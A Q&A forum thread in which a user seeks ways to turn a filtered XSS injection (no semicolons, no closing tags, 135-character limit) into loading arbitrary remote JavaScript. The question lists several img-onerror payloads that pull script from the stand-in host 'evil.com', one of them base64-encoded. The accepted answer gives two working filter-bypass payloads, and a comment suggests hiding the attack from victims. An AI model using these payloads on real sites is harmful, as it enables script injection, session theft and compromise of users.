0

I have found a web app that is vulnerable to XSS, and can get some javascript running using an img tag, however the method I am using destroys the rest of the page, as they are using some filters to attempt to stop it.

The filters I have detected so far are as follows:

  • </anythingyouwant> gets replaced with nothing
  • /> gets replaced with nothing
  • ; gets replaced with a space until the next >
  • 135 character limit including method of delivery ex <img src="." onerror="alert('xss')">

Injecting <img src="." onerror="alert('xss')"> works fine, however these developers are rather sceptical and wish to see a full PoC of full javascript code. Is it possible to run an arbitrary script at all?

I have tried:

  • <img src="." onerror="eval(atob('Yj1kb2N1bWVudDthPWIuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7YS5zcmM9Jy8vZXZpbC5jb20vbXlzY3JpcHQnO2IuYm9keS5hcHBlbmRDaGlsZChhKQ=='))"> result: too long, even with a shortened URL
  • <script src="//evil.com/myscript" /> result: can't close script tags like that, and it gets filtered, and it destroys the rest of the page by web app omitting 'closing' tag
  • <script src=//evil.com/myscript"></script> result: gets filtered, destroys rest of page as above
  • <img src="." onerror="b=document;a=b.createElement('script');a.src='//evil.com/myscript';b.body.appendChild(a)"> result: semicolons get filtered, breaks web page
  • <img src="." onerror="b=document a=b.createElement('script') a.src='//evil.com/myscript' b.body.appendChild(a)"> result: im unsure if this is valid js, but it appears in the chrome view page source as intended, but does not work as wanted

I am using chrome for testing, just in case it's relevant somehow.

frosty1
  • 13
  • 2
  • Use commas instead of semicolons. – Bergi Sep 29 '18 at 15:07
  • "*destroys rest of page*" - how is that a problem? As long as your code runs, you can do anything you like, including an attempt at restoring the rest of the page so that the user doesn't notice. – Bergi Sep 29 '18 at 15:08
  • @Bergi the original page is a mess and is dynamic, by "destroyed" I mean the rest of the page gets removed completely, and it would be too much code to recreate quickly. – frosty1 Sep 29 '18 at 16:43

1 Answers1

1

The security measures you listed are definitely insufficient. Two examples I could imagine to work for you:

<img src="." onerror="document.write('<script src=\'//evil.com/myscript\'><'+'/'+'script>')">

or your version with a , instead of a ;:

<img src="." onerror="b=document, a=b.createElement('script'), a.src='//evil.com/myscript', b.body.appendChild(a)">

But I am absolutely certain there are many other ways to do that. You could also check the following cheat sheet which I found in this answer.

likle
  • 1,717
  • 8
  • 10